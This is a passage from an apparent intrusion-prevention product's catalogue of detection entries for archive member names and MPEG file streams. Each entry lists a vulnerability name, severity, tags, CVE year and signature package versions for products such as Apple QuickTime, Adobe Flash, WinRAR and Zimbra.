Vulnerability: Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
Description:
Back to top

File-Member-Name_ATutor-Directory-Traversal-RCE

About this situation: An attempt to exploit a vulnerability in ATutor detected
Context: Archive type identification from member names
Severity: 7
Tags: Windows, Linux, Any Hardware, ATutor, CVE2019, Windows not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: ATutor-Directory-Traversal-RCE
Description:
Back to top

File-Member-Name_Directory-Traversal-In-File-Name

About this situation: A directory traversal pattern in a file name inside an archive
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1841-5242
Description:
Back to top

File-Member-Name_HP-Intelligent-Management-Center-Mibfileupload-Servlet-Vulnerability

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1732-5242
Vulnerability: HP-Intelligent-Management-Center-Mibfileupload-Servlet-Arbitrary-File-Upload
Description:
Back to top

File-Member-Name_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio Code Remote - Containers Extension detected
Context: Archive type identification from member names
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio Code, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
Description:
Back to top

File-Member-Name_RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in RARLAB WinRAR detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, RARLAB WinRAR, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability
Description:
Back to top

File-Member-Name_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Archive type identification from member names
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1011-5242
Last changed: sgpkg-ips-1863-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Member-Name_Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Softing edgeAggregator detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, Softing edgeAggregator, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal
Description:
Back to top

File-Member-Name_SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in SonicWall Analytics detected
Context: Archive type identification from member names
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, SonicWall Analytics, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal
Description:
Back to top

File-Member-Name_VBScript-File-Transfer

About this situation: A transfer of an archive containing a VBScript file detected
Context: Archive type identification from member names
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: VBScript-File-Transfer
Description:
Back to top

File-Member-Name_Windows-Script-File-Transfer

About this situation: A transfer of an archive containing a Windows Script File (WSF) detected
Context: Archive type identification from member names
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Windows-Script-File-Transfer
Description:
Back to top

File-Member-Name_Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Server detected
Context: Archive type identification from member names
Severity: 10
Tags: Any Operating System, Any Hardware, Zimbra Collaboration Server, CVE2022, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925
Description:
Back to top

File-MPEG_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow

About this situation: There exists a buffer overflow vulnerability in 3ivx MPEG-4.
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, 3ivx, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: 3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
Description:
Back to top

File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2012, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Flash-Player-MP4-File-Memory-Corruption
Adobe-Flash-Player-MP4-File-Memory-Corruption-CVE-2015-0360
Description:
Back to top

File-MPEG_Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF

About this situation: An attempt to exploit a vulnerability in Adobe Systems AIR detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF
Description:
Back to top

File-MPEG_Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Adobe Photoshop detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Photoshop, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-756-5211
Vulnerability: Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
Description:
Back to top

File-MPEG_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-MPEG_Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-And-iTunes-Heap-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer, Inc QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, Apple iTunes, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-Color-Table-Id-Heap-Corruption

About this situation: Attempt to exploit heap corruption vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Color-Table-Id-Heap-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-529-5211
Vulnerability: Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow

About this situation: Attempt to exploit integer underflow vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Apple QuickTime's H.264 processing component
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Image-Description-Atom-Sign-Extension

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple QuickTime, CVE2009, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-Media

About this situation: Detected a download of Apple QuickTime media file
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Apple QuickTime, Any Operating System not specific, Other Suspicious Traffic, Anomalies, Media File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1338-5242
Vulnerability: Apple-QuickTime-Media-Content
File-Type-Identification
Description:
Back to top

File-MPEG_Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow

About this situation: An attempt to exploit heap overflow vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-999-5242
Vulnerability: Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Movie-With-Embedded-Script

About this situation: An Apple QuickTime movie file with an embedded script detected
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Apple QuickTime, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Movie-With-Embedded-Script
Description:
Back to top

File-MPEG_Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Inc. QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Vulnerability: Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption
Description:
Back to top

File-MPEG_Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Stsc-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Stsc-Heap-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-867-5242
Vulnerability: Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access
Description:
Back to top

File-MPEG_Apple-QuickTime-Udta-Atom-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Quicktime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, Apple iTunes, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Udta-Atom-Buffer-Overflow
Description:
Back to top

File-MPEG_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability

About this situation: Attempt to exploit a heap overflow vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
Description:
Back to top

File-MPEG_Apple-QuickTime-Vr-Tkhd-Atom-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Vr-Tkhd-Heap-Corruption
Description:
Back to top

File-MPEG_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-MPEG_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-MPEG_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-MPEG_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: MPEG File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-MPEG_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: MPEG File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-MPEG_FFmpeg-Mov_Read_Keys-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in FFmpeg Project Team FFmpeg detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FFmpeg Project Team FFmpeg, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-825-5242
Vulnerability: FFmpeg-Mov_Read_Keys-Integer-Overflow
Description:
Back to top

File-MPEG_Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows

About this situation: An attempt to exploit a vulnerability in GStreamer Project GStreamer detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GStreamer, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows
Description:
Back to top

File-MPEG_ISO-MPEG-4-Download

About this situation: Detected a download of MPEG-4 media file
Context: MPEG File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: ISO-MPEG-4-Media-Content
File-Type-Identification
Description:
Back to top

File-MPEG_Libextractor-Qt-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the GNU libextractor detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libextractor, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-MPEG_Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2009-07, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption
Description:
Back to top

File-MPEG_Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2009-07, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
Description:
Back to top

File-MPEG_Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft DirectX detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, DirectX, MS2009-07, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption
Description:
Back to top

File-MPEG_Microsoft-DirectShow-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft DirectShow detected
Context: MPEG File Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, DirectX, MS2009-07, CVE2009, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Microsoft-DirectShow-Remote-Code-Execution
Description:
Back to top

File-MPEG_Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1255-5242
Vulnerability: Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free
Description:
Back to top

File-MPEG_Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read
Description:
Back to top

File-MPEG_Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-10, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915
Description:
Back to top

File-MPEG_MPlayer-For-Windows-Calloc-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in MPlayer for Win32 Project MPlayer detected
Context: MPEG File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MPlayer, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: MPlayer-For-Windows-Calloc-Integer-Overflow
Description:
Back to top

File-MPEG_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Nullsoft Winamp detected
Context: MPEG File Stream
Severity: 7
Tags: Windows, x86, Winamp, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
Description:
Back to top

File-MPEG_Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: MPEG File Stream
Severity: 7
